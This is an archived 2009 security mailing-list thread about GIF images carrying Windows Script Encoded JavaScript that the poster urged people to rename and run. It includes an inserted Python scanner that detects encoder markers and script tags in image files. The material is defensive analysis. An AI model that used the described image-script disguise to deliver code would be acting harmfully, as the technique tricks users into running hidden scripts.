PaulDotCom mailing list archives

Obfuscated Javascript in a JSE in an Image


From: pj_mcgarvey at hotmail.com (PJ McGarvey)
Date: Thu, 12 Feb 2009 08:56:38 -0500


I'm not sure it operates the same way as other javascript obfuscation I've seen, where the obfuscation is preceded by a 
<script> tag or some other programmatic technique, followed by the obfuscated code.  It sounds like it's Windows Script 
Encoded, but needs a decoder built-in to the browser to decode it.
 
What I'm confused about is, why was this image posted with instructions to rename and run it?  Does the poster of the 
image really expect people to do that?  Was he just sharing his malware with others on the board?  I'm assuming that 
b/c it was originally posted as a .gif that any browser would not attempt to decode and run it.  Though AV might pick 
it up - not sure.   I've seen AV pick up GIF images with <script> tags embedded at the end linking to malicious .js 
files.

Issue 3/2008 of Hakin9 has a good writeup on Javascript obfuscation by the way.

-PJ
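A file check along the lines PJ describes, added here as an example and not code from anyone in the thread: it flags a file that carries image magic bytes but also contains a Windows Script Encoder block (the `#@~^XXXXXX==` start marker and `XXXXXX==^#~@` end marker) or a `<script` tag. The sample bytes are constructed; reading the six characters after `#@~^` as a base64 little-endian length of the original script is an assumption.

```python
import base64
import re
import struct

# Windows Script Encoder (screnc) delimiters: "#@~^" + 6 base64 chars + "==" opens
# an encoded block, and 6 base64 chars + "==" + "^#~@" closes it.
SCRENC_START = re.compile(rb"#@~\^([A-Za-z0-9+/]{6}==)")
SCRENC_END = re.compile(rb"([A-Za-z0-9+/]{6}==)\^#~@")
IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif", b"\xff\xd8\xff": "jpeg",
               b"\x89PNG\r\n\x1a\n": "png"}


def image_type(data: bytes):
    """Return the image format the file claims to be (from magic bytes), or None."""
    for magic, name in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def scan_image_for_script(data: bytes) -> dict:
    """Flag image-magic files that also carry an encoded script block or a <script> tag."""
    result = {"image": image_type(data), "encoded_block": None, "script_tag": None,
              "plaintext_prefix": None, "suspicious": False}
    start = SCRENC_START.search(data)
    if start:
        # Assumption: the base64 field after "#@~^" is a little-endian uint32 holding
        # the length of the original (unencoded) script.
        declared = struct.unpack("<I", base64.b64decode(start.group(1)))[0]
        end = SCRENC_END.search(data, start.end())
        result["encoded_block"] = {"offset": start.start(), "declared_length": declared,
                                   "terminated": end is not None}
        # Bytes before the marker are plain script the host runs as-is; in the sample
        # discussed on the list the GIF header itself reads as a JS assignment.
        result["plaintext_prefix"] = data[:start.start()].decode("latin-1").strip()
    tag = re.search(rb"<script\b", data, re.IGNORECASE)
    if tag:
        result["script_tag"] = tag.start()
    result["suspicious"] = result["image"] is not None and (start is not None or tag is not None)
    return result


# Constructed sample (not the list's actual file): a GIF header written so it reads as
# a JS assignment, the page's start marker, filler, and an end marker.
SAMPLE_GIF_JSE = (b'GIF89aI    =    "x1!??";\r\n'
                  b"#@~^pwkAAA==" + b"X" * 40 + b"VKACAA==^#~@")
# Constructed sample: a GIF-like header with no script markers at all.
SAMPLE_CLEAN_GIF = b"GIF89a\x10\x00\x10\x00\x80\x00\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in (("jse-in-gif", SAMPLE_GIF_JSE), ("clean", SAMPLE_CLEAN_GIF)):
        print(name, scan_image_for_script(blob))
```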



Date: Wed, 11 Feb 2009 19:57:26 -0500
From: irongeek at irongeek.com
To: pauldotcom at mail.pauldotcom.com
Subject: Re: [Pauldotcom] Obfuscated Javascript in a JSE in an Image

Thanks, someone else mentioned ISC's post as well, but it seems to lack detail on what obfuscation system is being used.

Adrian
2009/2/11 Alvaro <alvaro.picapau at gmail.com>
Just in case you are still interested, I read the following in the ISC:
http://isc.sans.org/diary.html?storyid=5821&rss

Regards,
Alvaro
2009/2/8 Adrian Crenshaw <irongeek at irongeek.com> 



Thanks, that helps, but I'd love to know what they used to obfuscate this. I've seen a few schemes for obfuscating
Javascript, and this one is the fugliest I've encountered. I don't even understand how it can run.



On Sun, Feb 8, 2009 at 1:23 AM, Tim Mugherini <gbugbear at gmail.com> wrote:
Adrian

Dshield posted about this today. May want to check in with them.


On 2/7/09, Adrian Crenshaw <irongeek at irongeek.com> wrote:
> Ok, I found these images on 4chan that have encoded javascript in them, you
> have to save the gif as a jse to run them (but don't!!!, I'm just uploading
> the images to a forum so you can see what they are). Exactly how is this
> encoded, and can anyone tell what it does? This seems to be
> the script part:
>
> GIF89aI    =    "x1!??";
>
> If you want to see the gifs in question, look at this post:
> http://www.binrev.com/forums/index.php?showtopic=40285&hl=
>
> Adrian

--
Sent from my mobile device
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com